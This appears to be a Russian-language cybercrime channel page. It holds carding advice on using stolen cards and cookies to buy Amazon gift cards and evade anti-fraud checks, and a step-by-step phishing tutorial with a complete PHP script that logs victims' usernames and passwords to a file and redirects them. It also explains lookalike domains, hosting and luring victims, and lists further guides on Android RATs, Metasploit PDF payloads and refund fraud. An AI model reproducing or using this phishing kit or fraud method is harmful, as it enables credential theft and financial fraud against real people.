Восстановить невероятно сложно, может требовать ответа на секретный вопрос, срок действия карты, прием смс на номер КХ. Если видишь такую ошибку, пробуй оплатить с другой карты, либо возьми товар дешевле. От нехватки денег на карте никто не застрахован, поэтому здесь никаких гарантий, однако, как правило, деньги на картах водятся.
Что касается гифтов, главное по гифтам это номер карты. Без него гифты вбиваются редко, но и такое бывает. Пробуй вбить гифт, если подгрузил куки и амазон тебя сразу узнает, и не спрашивает пароль вовсе. Обычно это значит что куки свежие, и шоп настроен хорошо, можно пробовать. Возможно, но не факт. Проверить - дело одной минуты, обязательно проверь, если не получится, то ты ничего не потерял, а если выйдет, то будет очень приятно. Гифты скупаются моментально, пожалуй, самые быстрые деньги в карже.

Действуй аккуратно, имитируй КХ всеми возможными способами, играй в mind games с АнтиФрод системой.

Заходи в аккаунт, ставь фильтр на почту.
Грей аккаунт - чем дольше тем лучше. ВАЖНО!
Оплачивай, записывай шиппинг адрес, номер заказа, название продавца.
Отлавливай трек, желательно через почту. Не тревожь лишний раз АФ систему.
Рерут и получение выплаты.

Больше сливов тут👉𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Быстро пишем простой фишинг!

2024-04-26T15:36:56.767Z

В этой статье я научу как создать фишинговую страницу с нуля, даже если ты вообще в этом не шаришь.

Короче говоря, займемся кражей паролей пользователя ⚡️

Копирование

Для начала нам нужно скопировать страницу и выглядеть она должна идентично настоящей.

Чтобы пользователь, зашедший туда, увидел привычную и знакомую форму входа и без лишних размышлений о адресе страницы ввёл свой логин и пароль.

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Создаём для фейка отдельную папку. Туда и будем скидывать все нужные для него файлы
Открываем нужный нам сайт в браузере и заходим на страницу авторизации
Сохраняем эту страницу: файл - сохранить как... В появившемся окне выбираем тип сохраняемого файла: HTML-файл с изображениями, имя: index (лучше сохранить полную версию страницы).

Разбираемся в HTML

С помощью блокнота открываем исходный код сохраненной страницы index.htm

[IMG]

Много странных закорючек - это исходный код страницы

Как говориться “глаза бояться, а руки делают”

, поэтому начинаем фокусничать

Когда вы сохраняли страницу, рядом с полем для ввода логина и пароля наверняка были подписи (логично предположить что там было написано "логин", "пароль"). Вот по ним и будем ориентироваться. Ищем среди всего этого безобразия такие слова. Рядом с ними на странице у нас располагались поля ввода логина и пасса. В html коде они будут выглядеть примерно вот так:

Код:

<input type="text" name="login" value="" ......

<input type="password" name="password" ......

[IMG]

Имена полей (выделены жирным, в коде идут после "name=") не всегда будут именно login и password. Где-то это могут быть e-mail и pass , а где-то и username, parol.(оформление и названия зависит от кодера и сайта)

P.S. Блок с надписями "логин", "пароль" и формами ввода почти всегда находится в тэге <form>.

Временно записываем или запоминаем имена этих паролей
Ищем через Ctrl+F «action»

Код:

<form name="login" [U]action="users/passcheck.php"[/U] method="post" onsubmit="return check();">

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Меняем строку и прописываем параметру action значение login.php (если параметра action там нет - введите его сами: action="login.php")
Ищем параметр method (в той же строчке что form и action) и ставим ему значение “post” или “get”
Сохраняемся и закрываем

Волшебный скрипт

Наш скрипт будет выполнять самую важную функцию – перехват и запись введенных логина и пароля.

Код:

<?PHP

$Log = $_POST['login'];

$Pass = $_POST['password'];

$log = fopen("database.txt","at");

fwrite($log,"\n $Log:$Pass \n");

fclose($log);

echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://lleo.aha.ru/na/'></head></html>";

?>

А теперь по полочкам:

В первых двух строках переменным Log и Pass присваиваются значения соответствующих полей из предыдущего файла. Именно для этого мы записывали названия полей с сохранённой страницы: мы должны указать их скрипту. Меняем login и password из квадратных скобок на то, как были названы поля ввода на нашей сохранённой странице (Кавычки не трогаем!).
В третьей строке происходит открытие файла database.txt для записи. Можете назвать этот файл как хотите, хоть IIACCbI_JIOXOB.txt)) Главное - не забудьте как назвали (название должно быть написано английскими буквами) и создайте текстовый документ с таким именем в папке с фейком.
Четвёртая строка - запись в файл строки вида \n $Log:$Pass \n, где \n - переход на новую строку, $Log:$Pass - значения переменных с логином и паролем, записанные через двоеточие.
Строка пятая - сохранение, закрытие файла.
Последняя строка - редирект (переадресация) на другую страницу (пока юзверь не просёк что это фейк). В этой строчке после URL= вписываем адрес страницы, куда попадёт пользователь сразу после того как введёт логин и пароль (и снова будте аккуратны с кавычкой после адреса - она должна там быть!). Лучше всего отправить его на настоящую страницу (ну откуда там вы страничку копировали?) с сообщением о вводе неверного пароля. Тогда бедолага решит что что-то не так ввёл, попорбует снова и зайдёт, ничего не заподозрив!

Сохраняем файл с именем login.php в папку с фейком

Выход в мир Интернета

Нам понадобится бесплатный хостинг с поддержкой php

Например:

Регистрируем домен на этом хосте с названием, максимально похожим на адрес страницы, которую мы подделываем (например Vk.login.com), чтобы нашей цели не бросалось в глаза
Качаем Filezilla или любой другой файловый менеджер

𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Подключаем полученный хост через Filezilla

Слева видим все папки и файлы нашего компьютера, справа – наш сервер. Осталось его только дополнить

Перекидываем все сохраненные файлы нашей фишинговой страницы на новоиспеченный сайт.
Создаем на сайте текстовый файл “database.txt” (В нем и будут сохраняться все введенные логины и пароли в виде: “log : pass”)

Вместо localhost будем открывать тот адрес, который мы зарегистрировали. Соответственно, файл с сохранёнными паролями будет находиться там же (http://наш_адрес/database.txt).

В том же файловом менеджере ставим файлу максимальные права доступа – 777

Готово!

Теперь наш фишинговый сайт можно использовать в разных целях, но остался один главный шаг.

Социальная часть

Самый сложный и творческий этап. Придется импровизировать как заманить жертву на фейк.

Все зависит от тематики и интересов жертвы.

Писать на почту, в другие месенджеры, хоть голубем эту ссылку отправляйте. Это полностью ваша фантазия

Итог:

Мы создали фейковую страницу какого-то сайта, где теперь можем заимствовать пароли (или даже банковские карты).
По этой схеме можно создавать фейки за 10 минут

Это статья создана для того чтобы понять как создаются фишинговые сайты и автор не несет никакой ответственности за содеянное.

Спасибо что прочитал этот мануал надеюсь тебе будет полезно, если хочеш больше такой инфы подписывайся на канал 𝐏𝐫𝐨𝐠𝐫𝐚𝐦𝐲𝐬𝐭 𝐬 𝐃𝐧𝐞𝐩𝐫𝐚

Stenford

Получаем чужие логи бесплатно

Как взломать Android смартфон через .PDF файл

Вам понадобится:

Запуск консоли Metasploit

Создание PDF-файла (Полезная нагрузка)

Использование

Как спрятать вирус в картинку 📃

УСТАНОВКА И НАСТРОЙКА NOX ПОД ВБИВ!

ВБИВ DELL

Как получить (карту) ноутбук dell

Отработка Mega.nz

Что с этого можно получить?

Что понадобится?

Установка чекера Mega nz

Получаем Url:Login:Pass базы (Паблик)

Установка сортера баз

Отработка

RAT для Android

Как создать RAT для Android

Установка AhMyth RAT

Создание зараженного APK

Распространение RAT для Android

Соединение с зараженным устройством

Использование RAT AhMyth

Камера

Файловый менеджер

Микрофон

Геопозиция

Контакты

SMS

Журнал вызовов

Как защититься от RAT на Андроид?

Заключение

Рефаунд Adidas 📦

Adidas Reb

Вбив Амазона с логов

ОБРАЩАЙ НА ЭТО ВНИМАНИЕ. ВСЕГДА!

Идем дальше.

ВАЖНЫЙ МОМЕНТ

Быстро пишем простой фишинг!